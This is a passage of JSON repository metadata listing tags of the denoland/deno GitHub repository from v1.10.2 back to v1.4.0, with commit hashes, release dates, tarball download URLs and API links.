"published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t